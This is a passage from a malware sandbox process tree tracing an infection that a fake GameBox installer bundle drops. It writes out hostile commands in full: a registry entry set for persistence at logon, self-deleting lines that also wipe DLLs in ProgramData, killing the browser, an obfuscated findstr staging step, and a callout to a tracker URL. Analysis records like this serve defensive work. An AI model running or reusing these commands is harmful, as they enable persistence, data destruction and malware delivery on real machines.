                                                                      PID:8492
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout /t 6
                                                                      7⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:10060
                                                                • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4140
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-55R7T.tmp\Inlog.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-55R7T.tmp\Inlog.tmp" /SL5="$2028E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                    6⤵
                                                                      PID:5948
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-O75SU.tmp\Setup.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-O75SU.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                        7⤵
                                                                          PID:1020
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-277II.tmp\Setup.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-277II.tmp\Setup.tmp" /SL5="$1059E,17367683,721408,C:\Users\Admin\AppData\Local\Temp\is-O75SU.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                            8⤵
                                                                            • Loads dropped DLL
                                                                            • Drops file in Program Files directory
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            PID:8004
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-2KF2B.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                              9⤵
                                                                                PID:5116
                                                                                • C:\Windows\SysWOW64\expand.exe
                                                                                  expand C:\Users\Admin\AppData\Local\Temp\is-2KF2B.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                  10⤵
                                                                                  • Drops file in Windows directory
                                                                                  PID:8708
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                9⤵
                                                                                  PID:9464
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                    10⤵
                                                                                      PID:9524
                                                                                  • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                    "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                    9⤵
                                                                                      PID:5488
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                      9⤵
                                                                                      • Checks computer location settings
                                                                                      PID:9536
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-2KF2B.tmp\{app}\vdi_compiler.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-2KF2B.tmp\{app}\vdi_compiler"
                                                                                      9⤵
                                                                                        PID:7916
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-2KF2B.tmp\{app}\vdi_compiler.exe"
                                                                                          10⤵
                                                                                            PID:8808
                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                              ping localhost -n 4
                                                                                              11⤵
                                                                                              • Runs ping.exe
                                                                                              PID:8996
                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Enumerates connected drives
                                                                                  • Modifies system certificate store
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  PID:5640
                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629472586 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                    6⤵
                                                                                      PID:8920
                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5736
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-I6P3B.tmp\WEATHER Manager.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-I6P3B.tmp\WEATHER Manager.tmp" /SL5="$103C4,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:6128
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-MTNKP.tmp\Setup.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-MTNKP.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                        7⤵
                                                                                          PID:6724
                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-MTNKP.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-MTNKP.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629472586 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in Program Files directory
                                                                                            PID:6084
                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5956
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                        6⤵
                                                                                          PID:6948
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill /f /im chrome.exe
                                                                                            7⤵
                                                                                            • Kills process with taskkill
                                                                                            PID:8216
                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5452
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-BKHPP.tmp\VPN.tmp
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-BKHPP.tmp\VPN.tmp" /SL5="$103C6,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          PID:5312
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-DS4IJ.tmp\Setup.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-DS4IJ.tmp\Setup.exe" /silent /subid=720
                                                                                            7⤵
                                                                                              PID:4060
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-7EML2.tmp\Setup.tmp
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-7EML2.tmp\Setup.tmp" /SL5="$30574,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-DS4IJ.tmp\Setup.exe" /silent /subid=720
                                                                                                8⤵
                                                                                                • Loads dropped DLL
                                                                                                • Drops file in Program Files directory
                                                                                                • Modifies registry class
                                                                                                • Modifies system certificate store
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                PID:4844
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                  9⤵
                                                                                                    PID:8996
                                                                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                      tapinstall.exe remove tap0901
                                                                                                      10⤵
                                                                                                      • Checks SCSI registry key(s)
                                                                                                      PID:4608
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                    9⤵
                                                                                                      PID:4996
                                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                        tapinstall.exe install OemVista.inf tap0901
                                                                                                        10⤵
                                                                                                        • Drops file in System32 directory
                                                                                                        • Drops file in Windows directory
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        PID:7344
                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                      9⤵
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:8744
                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                      9⤵
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:8672
                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                              5⤵
                                                                                                PID:6052
                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-7RNP0.tmp\MediaBurner2.tmp
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-7RNP0.tmp\MediaBurner2.tmp" /SL5="$1046C,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                  6⤵
                                                                                                    PID:5604
                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4980
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\tmpDCFE_tmp.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\tmpDCFE_tmp.exe"
                                                                                                    6⤵
                                                                                                      PID:6468
                                                                                                      • C:\Windows\SysWOW64\dllhost.exe
                                                                                                        "C:\Windows\System32\dllhost.exe"
                                                                                                        7⤵
                                                                                                          PID:5264
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                          7⤵
                                                                                                            PID:6824
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd
                                                                                                              8⤵
                                                                                                                PID:8332
                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                  findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                  9⤵
                                                                                                                    PID:4136
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                    Esplorarne.exe.com i
                                                                                                                    9⤵
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                    PID:7032
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                      10⤵
                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                      PID:5468
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                        11⤵
                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                        PID:3164
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                          12⤵
                                                                                                                          • Drops startup file
                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                          PID:212
                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                    ping RJMQBVDN -n 30
                                                                                                                    9⤵
                                                                                                                    • Runs ping.exe
                                                                                                                    PID:7676
                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                            5⤵
                                                                                                            • Checks computer location settings
                                                                                                            PID:5048
                                                                                                            • C:\Users\Admin\Documents\usn1HWHy13Z2dpa1Y1WevbBF.exe
                                                                                                              "C:\Users\Admin\Documents\usn1HWHy13Z2dpa1Y1WevbBF.exe"
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                              PID:4336
                                                                                                              • C:\Users\Admin\Documents\usn1HWHy13Z2dpa1Y1WevbBF.exe
                                                                                                                "C:\Users\Admin\Documents\usn1HWHy13Z2dpa1Y1WevbBF.exe"
                                                                                                                7⤵
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:9176
                                                                                                            • C:\Users\Admin\Documents\MNhfoNqNw4G_jZpRAIMWZ5O4.exe
                                                                                                              "C:\Users\Admin\Documents\MNhfoNqNw4G_jZpRAIMWZ5O4.exe"
                                                                                                              6⤵
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:5012
                                                                                                              • C:\Users\Admin\Documents\MNhfoNqNw4G_jZpRAIMWZ5O4.exe
                                                                                                                C:\Users\Admin\Documents\MNhfoNqNw4G_jZpRAIMWZ5O4.exe
                                                                                                                7⤵
                                                                                                                  PID:8168
                                                                                                              • C:\Users\Admin\Documents\jM6iBgl0DGTXaTI7zY_0ZhnY.exe
                                                                                                                "C:\Users\Admin\Documents\jM6iBgl0DGTXaTI7zY_0ZhnY.exe"
                                                                                                                6⤵
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:7120
                                                                                                                • C:\Users\Admin\Documents\jM6iBgl0DGTXaTI7zY_0ZhnY.exe
                                                                                                                  C:\Users\Admin\Documents\jM6iBgl0DGTXaTI7zY_0ZhnY.exe
                                                                                                                  7⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:8176
                                                                                                              • C:\Users\Admin\Documents\zidYAD8mi_glJ6Ux1RWDW3Ei.exe
                                                                                                                "C:\Users\Admin\Documents\zidYAD8mi_glJ6Ux1RWDW3Ei.exe"
                                                                                                                6⤵
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Checks whether UAC is enabled
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                PID:4584
                                                                                                              • C:\Users\Admin\Documents\zrc6kXt4qeInQxoZ1rcs4I4i.exe
                                                                                                                "C:\Users\Admin\Documents\zrc6kXt4qeInQxoZ1rcs4I4i.exe"
                                                                                                                6⤵
                                                                                                                  PID:6640
                                                                                                                  • C:\Users\Admin\Documents\zrc6kXt4qeInQxoZ1rcs4I4i.exe
                                                                                                                    C:\Users\Admin\Documents\zrc6kXt4qeInQxoZ1rcs4I4i.exe
                                                                                                                    7⤵
                                                                                                                      PID:8156
                                                                                                                  • C:\Users\Admin\Documents\iuLPOtNqnEcuTEQs1krEQx_q.exe
                                                                                                                    "C:\Users\Admin\Documents\iuLPOtNqnEcuTEQs1krEQx_q.exe"
                                                                                                                    6⤵
                                                                                                                      PID:5132
                                                                                                                    • C:\Users\Admin\Documents\vD0P7TqEUn6wugz2UPGQgmrS.exe
                                                                                                                      "C:\Users\Admin\Documents\vD0P7TqEUn6wugz2UPGQgmrS.exe"
                                                                                                                      6⤵
                                                                                                                        PID:7032
                                                                                                                        • C:\Users\Admin\Documents\vD0P7TqEUn6wugz2UPGQgmrS.exe
                                                                                                                          "C:\Users\Admin\Documents\vD0P7TqEUn6wugz2UPGQgmrS.exe"
                                                                                                                          7⤵
                                                                                                                            PID:6760
                                                                                                                        • C:\Users\Admin\Documents\qhdNSSlsMFE9u929bFYs5cMn.exe
                                                                                                                          "C:\Users\Admin\Documents\qhdNSSlsMFE9u929bFYs5cMn.exe"
                                                                                                                          6⤵
                                                                                                                          • Checks BIOS information in registry
                                                                                                                          • Checks whether UAC is enabled
                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                          PID:7188
                                                                                                                        • C:\Users\Admin\Documents\nTQizWekdFhEIA7iC67VMzLv.exe
                                                                                                                          "C:\Users\Admin\Documents\nTQizWekdFhEIA7iC67VMzLv.exe"
                                                                                                                          6⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Checks processor information in registry
                                                                                                                          PID:7248
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im nTQizWekdFhEIA7iC67VMzLv.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\nTQizWekdFhEIA7iC67VMzLv.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                            7⤵
                                                                                                                              PID:7048
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /im nTQizWekdFhEIA7iC67VMzLv.exe /f
                                                                                                                                8⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:5416
                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                timeout /t 6
                                                                                                                                8⤵
                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                PID:10160
                                                                                                                          • C:\Users\Admin\Documents\m9bxQ1TP97dv_BefIPVWAp_A.exe
                                                                                                                            "C:\Users\Admin\Documents\m9bxQ1TP97dv_BefIPVWAp_A.exe"
                                                                                                                            6⤵
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:7320
                                                                                                                            • C:\Users\Admin\Documents\m9bxQ1TP97dv_BefIPVWAp_A.exe
                                                                                                                              "C:\Users\Admin\Documents\m9bxQ1TP97dv_BefIPVWAp_A.exe"
                                                                                                                              7⤵
                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                              PID:7744
                                                                                                                          • C:\Users\Admin\Documents\7asrAxZjL80lJoRzSnQniRJy.exe
                                                                                                                            "C:\Users\Admin\Documents\7asrAxZjL80lJoRzSnQniRJy.exe"
                                                                                                                            6⤵
                                                                                                                              PID:7412
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-9M2OB.tmp\7asrAxZjL80lJoRzSnQniRJy.tmp
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-9M2OB.tmp\7asrAxZjL80lJoRzSnQniRJy.tmp" /SL5="$302C0,138429,56832,C:\Users\Admin\Documents\7asrAxZjL80lJoRzSnQniRJy.exe"
                                                                                                                                7⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                PID:7600
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-T81LJ.tmp\Setup.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-T81LJ.tmp\Setup.exe" /Verysilent
                                                                                                                                  8⤵
                                                                                                                                    PID:5900
                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                      9⤵
                                                                                                                                        PID:6788
                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629472586 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                          10⤵
                                                                                                                                            PID:9348
                                                                                                                                  • C:\Users\Admin\Documents\uTQjNWSMkxGVpb2Z7LDCxulu.exe
                                                                                                                                    "C:\Users\Admin\Documents\uTQjNWSMkxGVpb2Z7LDCxulu.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    PID:7464
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im uTQjNWSMkxGVpb2Z7LDCxulu.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\uTQjNWSMkxGVpb2Z7LDCxulu.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                      7⤵
                                                                                                                                        PID:4152
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          8⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:2100
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /im uTQjNWSMkxGVpb2Z7LDCxulu.exe /f
                                                                                                                                          8⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:5424
                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                          timeout /t 6
                                                                                                                                          8⤵
                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                          PID:10132
                                                                                                                                    • C:\Users\Admin\Documents\z9FXbzO86QTM0vCPFtyymoe7.exe
                                                                                                                                      "C:\Users\Admin\Documents\z9FXbzO86QTM0vCPFtyymoe7.exe"
                                                                                                                                      6⤵
                                                                                                                                        PID:7396
                                                                                                                                      • C:\Users\Admin\Documents\DFzEQwKRXZ5ZEVhwDKIwmgFB.exe
                                                                                                                                        "C:\Users\Admin\Documents\DFzEQwKRXZ5ZEVhwDKIwmgFB.exe"
                                                                                                                                        6⤵
                                                                                                                                          PID:7224
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\7713716.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\7713716.exe"
                                                                                                                                            7⤵
                                                                                                                                              PID:2080
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\3282424.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\3282424.exe"
                                                                                                                                              7⤵
                                                                                                                                              • Suspicious behavior: SetClipboardViewer
                                                                                                                                              PID:6420
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\7827705.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\7827705.exe"
                                                                                                                                              7⤵
                                                                                                                                                PID:8480
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\4564971.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\4564971.exe"
                                                                                                                                                7⤵
                                                                                                                                                  PID:7436
                                                                                                                                              • C:\Users\Admin\Documents\LcQF0Ro67ZIvqxXHESFnAh_t.exe
                                                                                                                                                "C:\Users\Admin\Documents\LcQF0Ro67ZIvqxXHESFnAh_t.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                PID:1536
                                                                                                                                              • C:\Users\Admin\Documents\lPiIL5z_Qt9YRzZQpPCwzzQF.exe
                                                                                                                                                "C:\Users\Admin\Documents\lPiIL5z_Qt9YRzZQpPCwzzQF.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                PID:7496
                                                                                                                                              • C:\Users\Admin\Documents\O6RdQBFrVLCQNnVuVnXcKkYp.exe
                                                                                                                                                "C:\Users\Admin\Documents\O6RdQBFrVLCQNnVuVnXcKkYp.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:7572
                                                                                                                                                • C:\Users\Admin\Documents\wVv4kElmlVudV_tXpvoDWzXI.exe
                                                                                                                                                  "C:\Users\Admin\Documents\wVv4kElmlVudV_tXpvoDWzXI.exe"
                                                                                                                                                  6⤵
                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                  PID:7636
                                                                                                                                                • C:\Users\Admin\Documents\dAulRGDtPjc4J5xS4RPhJcSY.exe
                                                                                                                                                  "C:\Users\Admin\Documents\dAulRGDtPjc4J5xS4RPhJcSY.exe"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:7664
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im dAulRGDtPjc4J5xS4RPhJcSY.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\dAulRGDtPjc4J5xS4RPhJcSY.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                      7⤵
                                                                                                                                                        PID:7356
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          taskkill /im dAulRGDtPjc4J5xS4RPhJcSY.exe /f
                                                                                                                                                          8⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:2184
                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                          timeout /t 6
                                                                                                                                                          8⤵
                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                          PID:10100
                                                                                                                                                    • C:\Users\Admin\Documents\7tjvaKsz5HVxxD8ZwLvjtR7w.exe
                                                                                                                                                      "C:\Users\Admin\Documents\7tjvaKsz5HVxxD8ZwLvjtR7w.exe"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:7812
                                                                                                                                                      • C:\Users\Admin\Documents\pslGlwdNERRthzSueRLE0afi.exe
                                                                                                                                                        "C:\Users\Admin\Documents\pslGlwdNERRthzSueRLE0afi.exe"
                                                                                                                                                        6⤵
                                                                                                                                                          PID:7904
                                                                                                                                                          • C:\Users\Admin\Documents\pslGlwdNERRthzSueRLE0afi.exe
                                                                                                                                                            "C:\Users\Admin\Documents\pslGlwdNERRthzSueRLE0afi.exe" -q
                                                                                                                                                            7⤵
                                                                                                                                                              PID:4816
                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                8⤵
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:6640
                                                                                                                                                          • C:\Users\Admin\Documents\5KB4pUtGYJ4rNRINQ0y7ksSA.exe
                                                                                                                                                            "C:\Users\Admin\Documents\5KB4pUtGYJ4rNRINQ0y7ksSA.exe"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:7976
                                                                                                                                                            • C:\Users\Admin\Documents\xcA4YQr1WA4xxMyFBatwknsN.exe
                                                                                                                                                              "C:\Users\Admin\Documents\xcA4YQr1WA4xxMyFBatwknsN.exe"
                                                                                                                                                              6⤵
                                                                                                                                                                PID:8040
                                                                                                                                                              • C:\Users\Admin\Documents\5oviYe4m2Fr0_zEBggIac05C.exe
                                                                                                                                                                "C:\Users\Admin\Documents\5oviYe4m2Fr0_zEBggIac05C.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:7936
                                                                                                                                                                • C:\Users\Admin\Documents\5oviYe4m2Fr0_zEBggIac05C.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\5oviYe4m2Fr0_zEBggIac05C.exe"
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:2224
                                                                                                                                                                • C:\Users\Admin\Documents\WjN01g9DeN6yC8xgDgY0l708.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\WjN01g9DeN6yC8xgDgY0l708.exe"
                                                                                                                                                                  6⤵
